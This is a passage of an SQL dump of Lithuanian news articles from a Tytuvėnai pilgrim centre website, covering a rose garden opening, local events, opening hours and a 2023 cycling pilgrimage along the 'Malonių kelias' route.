justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Kad visi geri darbai nebūtų pamiršti, padėkota visiems prisidėjusiems prie šio projekto ir įteiktos simbolinės dovanos:</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už projekto pradžią, mintį buvusiai VšĮ „Tytuvėnų piligrimų centras“ direktorei Astai Vaitkevičiūtei-Kizienei;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už patį projektą, jo autoriams Mildai ir Kęstučiui;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už piniginį indėlį Kelmės rajono savivaldybei;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už bendrą darbą, pagalbą tiek rengiant paraišką, tiek pildant tolimesnius dokumentus, už šiltą bendravimą Kelmės vietinės veiklos grupei;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už gražius takelius ir formas UAB „Grunkasta“;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už šiltą bendravimą, konsultacijas ir rožių sodinukus Oksanai ir Mindaugui Vozbinams;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už visokeriopą pagalbą Tytuvėnų seniūnijai;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už visą didžiausią atliktą darbą sodinant rožes VšĮ „Tytuvėnų piligrimų centras“ ūkio dalies vedėjui Virginijui Pikučiui;</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>- už skanų ir didelį tortą Snieginai Venckūnienei.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><span><span><span><span>Rožės – tai dieviškumo, tobulo grožio simbolis. Tikimės, kad šis rožių grožis ir aromatas džiugins ne tik žmonių akis, bet ir širdis ne vienerius metus.</span></span></span></span></span></span></p>',1,0,0,44,'2019-06-21 04:28:10',135,'','2019-06-21 04:51:57',135,0,'0000-00-00 00:00:00','2019-06-21 04:28:10','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/rozyno_atidarymas\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,55,'','',1,2414,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(335,424,'BALTAS VAKARAS','baltas-vakaras','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Jauti? Artėja šiltas, smagus ir bendravimo kupinas vakaras...</span></p>\r\n','\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/baltasvakaras2019/skelbimas.jpg\" border=\"0\" alt=\"\" style=\"float: left;\" /></span></p>',1,0,0,44,'2019-07-15 04:10:29',135,'','2019-07-15 04:11:13',135,0,'0000-00-00 00:00:00','2019-07-15 04:10:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/baltasvakaras2019\\/main.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,54,'','',1,2234,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(336,425,'XVI Tytuvėnų vasasaros festivalis','xvi-tytuvenu-vasasaros-festivalis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">XVI tarptautinis Tytuvėnų vasaros festivalis</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vasaros muzika - Jums</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/fetivalis/Tytuvenai_2019_web2.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2019-07-15 04:18:41',135,'','2019-07-15 04:18:54',135,0,'0000-00-00 00:00:00','2019-07-15 04:18:41','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/fetivalis\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,53,'','',1,2348,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(337,426,'Europos paveldo dienos Tytuvėnuose','europos-paveldo-dienos-tytuvenuose','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">EUROPOS PAVELDO DIENOS<br />TYTUVĖNUOSE<br />2019-09 - 20/21</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/paveldo_dienos_2019/paveldo_dienos.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2019-09-11 04:41:22',135,'','2019-09-11 04:42:15',135,0,'0000-00-00 00:00:00','2019-09-11 04:41:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/paveldo_dienos_2019\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,52,'','',1,2311,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(338,427,'Naujas darbo laikas','naujas-darbo-laikas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">I - IV 8.00 - 17.00<br />V      8.00 - 16.00<br />VI - VII pagal užsakymus, susitarimą</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/darbo_laikas/darbo_laikas.jpg\" border=\"0\" alt=\"\" /></span></p>',0,0,0,44,'2019-10-16 04:39:32',135,'','2019-10-16 04:43:02',135,0,'0000-00-00 00:00:00','2019-10-16 04:39:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/darbo_laikas\\/main_darbo_laikas1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,51,'','',1,632,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(388,480,'Dviračių žygis \'23','dviraciu-zygis-23','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vieni pirmųjų išbandė „Malonių kelią“: tai naujas maršrutas Lietuvoje!</span></p>\r\n','\r\n<p>{gallery cols=3 orientation=horizontal <span> width=300</span><span><span>}stories/naujienos/dviraciu_zygis23/album/{/gallery}</span></span></p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Būrys dviratininkų iš visos Lietuvos išbandė naują piligriminį maršrutą Lietuvoje „Malonių kelias“. Kelionė vyko tris dienas, per kurias dviračiais įveikta daugiau nei 170 km. Ką keliautojai pamatė ir sužinojo bei ką pataria kitiems keliautojams?</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">„Malonių kelias“ (lot. <em>Via Gratiarum</em>) – tai piligrimams ir turistams skirti maršrutai, besidriekiantys keturių Lietuvos savivaldybių – Šiaulių miesto ir Kelmės, Raseinių, Šiaulių rajonų – teritorijose. Birželio 25-27 dienomis dviračiais „Malonių kelią“ būryje įveikė daugiau nei 20 dviratininkų. Dviračių žygyje dalyvavo įvairaus amžiaus žmonės – nuo moksleivių iki senjorų. Dviratininkai atvyko iš Šiaulių, Raseinių, Mažeikių, Klaipėdos, Vilniaus, Kuršėnų, Palangos bei Kauno.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dviračių žygis pradėtas sekmadienio rytą Raseinių rajone, Šiluvos miestelyje, nuo <strong>Šiluvos Švč. Mergelės Marijos Gimimo bazilikos</strong> (M. Jurgaičio g. 2, Šiluva). Šiluva – vienas pagrindinių Lietuvos piligrimystės centrų, kasmet sukviečiantis tūkstančius. Tikima, jog Šiluvoje yra apsireiškusi Jėzaus motina Marija. 1993 m. rugsėjo 7 d. Šiluvoje lankėsi popiežius Jonas Paulius II, jo garbei nuo 2011 m. Šilinių atlaidai pradedami švęsti rugsėjo 7-ąją.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Maždaug už 8 km nuo Šiluvos – Kelmės rajono Tytuvėnų miestelis, kurio pagrindinis piligriminis objektas – <strong>Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir bernardinų vienuolyno ansamblis</strong> (Maironio g. 2A, Tytuvėnai). Tai vienas įdomiausių ir didžiausių XVII–XVIII a. Lietuvos sakralinės architektūros kompleksų, pasižymintis architektūros stilių įvairove. Tytuvėnų bažnyčioje yra stebuklingas Švč. Dievo Motinos su Kūdikiu paveikslas, o bažnyčios šventoriuje – unikali Šventųjų laiptų koplyčia. Malonėmis garsėjantis Švč. Dievo Motinos su Kūdikiu paveikslas yra nutapytas XVII a. 3-­iajame dešimtmetyje. Tai visos bažnyčios puošmena. Tytuvėnų vienuolyne galima užsisakyti gido paslaugas. Maždaug valandos trukmės ekskursijoje dviratininkai išgirdo išties mažai kam žinomų ir labai įdomių faktų apie šį kompleksą ir prie jo gyvavimo prisidėjusias asmenybes. Jei kelionę į Tytuvėnus planuojate iš anksto ir su grupe, dviratininkai rekomenduoja susisiekti su darbuotojais ir iš anksto užsisakyti ten gaminamus pietus. „Maistas paprastas, bet labai skanus, atrodo, valgome tarsi namuose“, – sakė vienas iš žygeivių Mindaugas, taip pat akcentavęs, jog pasistiprinti vienuolyno rūsyje – ypatinga patirtis.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Pirmąją kelionės dieną dviratininkai dar aplankė <strong>Kiaunorių Šv. Juozapo bažnyčią</strong> ir susitiko su kunigu Donatu Grabažiu, kuris papasakojo apie šią, taip pat <strong>Pakapės</strong><strong>Švč. Mergelės Marijos Ėmimo į dangų</strong> ir <strong>Rėkyvos Šv. Juozapo Darbininko bažnyčias</strong>. Ar žinojote, jog Rėkyvoje, Šiaulių rajone stūkso turbūt  mažiausia bažnyčia Lietuvoje?</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šis dienos maršrutas nusidriekęs apie 53 km.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dviratininkai norintiems nebrangiai ir patogiai apsistoti Šiauliuose, rekomenduoja miesto centre įsikūrusį Šiaulių valstybinės kolegijos bendrabutį. Svetingumo paslaugų centre (Aušros al. 40) gali apsistoti ne tik į kolegiją, bet ir į miestą ar regioną atvykę žmonės – čia yra 18 kambarių, kuriuose vienu metu gali gyventi net 47 svečiai.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Antrąją dieną dviratininkai pradėjo nuo susitikimo su Šiaulių katedros vyskupu Eugenijumi Bartuliu. Ne vienas dviratininkas <strong>Šiaulių Šv. Apaštalų Petro ir Pauliaus katedroje</strong> (Aušros tak. 3, 76294 Šiauliai) lankėsi pirmą kartą ir nustebo, kokia ji didelė ir didinga. Šio švento statinio bokštas siekia net 70 metrų.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Keliaujant „Malonių keliu“ kviečiama aplankyti ne tik sakralinės vertės objektus, bet taip pat ir lankytojų centrus, kitas turistines vietas. Trijų dienų dviračio žygio dalyviai buvo maloniai nustebinti apsilankę visai neseniai atidarytame Baltų kultūros pažinimo centre „Baltų kelias“ (Vilniaus g. 213, Šiauliai). Pirmojo Lietuvoje ir Latvijoje interaktyvaus baltų kultūros populiarinimo centro „Baltų kelias“ tikslas – skatinti keliauti ir pažinti baltų materialųjį ir nematerialųjį kultūrinį bei gamtos paveldą. Čia šiuolaikinėmis technologijomis, eksponatų kopijomis, edukacinėmis veiklomis pristatoma baltų istorija, kultūra, gyvensena sukuriant galimybes ugdyti baltiškojo paveldo pažinimą ir jo išsaugojimą. Patiks ir mažiems, ir suaugusiems! O gal norėtumėte įsigyti „Lietuvos kvapo”?</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kiek daugiau nei 20 km nuo „Baltų kelio“ dviratininkai pasiekė <strong>Kurtuvėnų Šv. apaštalo Jokūbo bažnyčią </strong>(P. Višinskio g. 31, Kurtuvėnai). Šioje bažnyčioje tik prieš 21 metus atrastas rūsys. Erdvė buvo pradėta tyrinėti, aptikta įvairių radinių, jie restauruoti. Jausmas lįsti į bažnyčios rūsius išties neeilinis. Šiuo metu ši erdvė pasiekiama lankytojams. Norėdami ten apsilankyti ir išgirsti unikalių istorijų, kviečiame susisiekti su Kurtuvėnų bažnyčios kunigu Mariumi Dygliu (tel. nr. +370 617 17 515).</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 